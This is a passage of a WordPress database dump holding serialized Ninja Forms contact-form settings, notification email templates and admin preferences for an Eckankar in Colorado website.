Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_101\";}}i:294;a:1:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_102\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_102\";s:5:\"value\";s:0:\"\";}}i:617;a:1:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797718830\";s:14:\"drawerDisabled\";b:0;}}i:296;a:1:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_104\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_104\";}}i:618;a:1:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797717432\";}}}s:7:\"actions\";a:4:{i:125;a:1:{s:8:\"settings\";a:32:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:9:\"Save Form\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:9:\"parent_id\";s:1:\"6\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}}i:126;a:1:{s:8:\"settings\";a:30:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_96}\";s:13:\"email_subject\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:9:\"parent_id\";s:1:\"6\";s:13:\"email_message\";s:3382:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_94},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>\";s:14:\"drawerDisabled\";s:0:\"\";}}i:127;a:1:{s:8:\"settings\";a:35:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:9:\"parent_id\";s:1:\"6\";s:14:\"drawerDisabled\";s:0:\"\";}}i:128;a:1:{s:8:\"settings\";a:30:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:9:\"parent_id\";s:1:\"6\";s:13:\"email_message\";s:3442:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAâs</span> form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br><br><br> <strong><br><br><br> The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94}Â&nbsp;{field:lastname_95}</span> has submitted:</strong></p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>\";}}}}'),(2326,15,'mec_op','a:0:{}'),(2327,15,'wpcl_user-settings','libraryContent=browse&editor=tinymce&advImgDetails=show&mfold=o'),(2328,15,'wpcl_user-settings-time','1685913181'),(2655,2,'_bws_affiliate_postbox_dismissed','1698258544'),(2662,2,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:21:\"bgbkup_uses_resources\";s:9:\"timestamp\";i:1650471092;}'),(2664,15,'meta-box-order_page','a:3:{s:4:\"side\";s:117:\"submitdiv,pageparentdiv,wpXSG-meta,nf_admin_metaboxes_appendaform,passster_global,passster,passster_link,postimagediv\";s:6:\"normal\";s:73:\"butterbean-ui-boldgrid_seo,scripts-to-footer,postcustom,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(2665,15,'screen_layout_page','2'),(2666,15,'closedpostboxes_page','a:0:{}'),(2667,15,'metaboxhidden_page','a:7:{i:0;s:10:\"wpXSG-meta\";i:1;s:15:\"passster_global\";i:2;s:8:\"passster\";i:3;s:17:\"scripts-to-footer\";i:4;s:10:\"postcustom\";i:5;s:7:\"slugdiv\";i:6;s:9:\"authordiv\";}'),(2743,15,'meta-box-order_mec-events','a:3:{s:4:\"side\";s:111:\"submitdiv,tagsdiv-post_tag,mec_categorydiv,wpXSG-meta,mec_metabox_color,mec_metabox_label,passster,postimagediv\";s:6:\"normal\";s:110:\"mec_metabox_details,mec_metabox_booking,postexcerpt,commentstatusdiv,slugdiv,authordiv,wpcode-metabox-snippets\";s:8:\"advanced\";s:0:\"\";}'),(2744,15,'screen_layout_mec-events','2'),(2825,2,'tlwp_feedback_maybe_later','1'),(2826,2,'tlwp_feedback_maybe_later_time','1651596468'),(2839,15,'tlwp_feedback_do_not_ask_again','1'),(2840,15,'tlwp_feedback_do_not_ask_again_time','1652019625'),(2856,2,'tlwp_feedback_review_done','1'),(2857,2,'tlwp_feedback_review_done_time','1653059469'),(2984,15,'closedpostboxes_mec-events','a:1:{i:0;s:23:\"wpcode-metabox-snippets\";}'),(2985,15,'metaboxhidden_mec-events','a:1:{i:0;s:7:\"slugdiv\";}'),(3048,2,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:19:\"feedback-notice-1-1\";s:9:\"timestamp\";i:1658250675;}'),(3085,15,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:19:\"feedback-notice-1-1\";s:9:\"timestamp\";i:1658927022;}'),(3105,2,'tgmpa_dismissed_notice_bgtfw','1'),(3118,2,'edit_bg_block_per_page','20'),(3176,15,'tgmpa_dismissed_notice_bgtfw','1'),(3198,2,'managepluginscolumnshidden','a:1:{i:0;s:12:\"auto-updates\";}'),(3391,2,'advanced_google_recaptcha_wpan_dismissed','1'),(3438,15,'wp_mail_smtp_edu_notice_bar_dismissed','1670279938'),(3464,2,'meta-box-order_bg_block','a:3:{s:6:\"normal\";s:0:\"\";s:8:\"advanced\";s:23:\"wpcode-metabox-snippets\";s:4:\"side\";s:10:\"wpXSG-meta\";}'),(3465,2,'screen_layout_bg_block','2'),(3520,2,'wpcl_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2023-03-31T15:44:02.265Z\";}'),(3535,2,'roc_dismissed_pro_release_notice','1'),(3585,2,'edit_mec-events_per_page','20'),(3632,2,'manageedit-mec-eventscolumnshidden','a:2:{i:0;s:9:\"organizer\";i:1;s:12:\"sold_tickets\";}'),(3641,2,'wpcl_nf_form_preview_13','a:4:{s:2:\"id\";i:13;s:8:\"settings\";a:31:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:0;s:5:\"title\";s:33:\"Eckankar In Colorado Contact Form\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:48\";s:10:\"form_title\";s:33:\"Eckankar In Colorado Contact Form\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";i:1;s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663798083380\";i:9;s:10:\"submit_278\";}s:17:\"default_label_pos\";s:5:\"above\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:24:\"form_title_heading_level\";s:1:\"3\";}s:6:\"fields\";a:10:{i:132;a:1:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:229:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:245:\"<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below\";s:3:\"key\";s:8:\"html_267\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_267\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:133;a:1:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:15:\"one-third 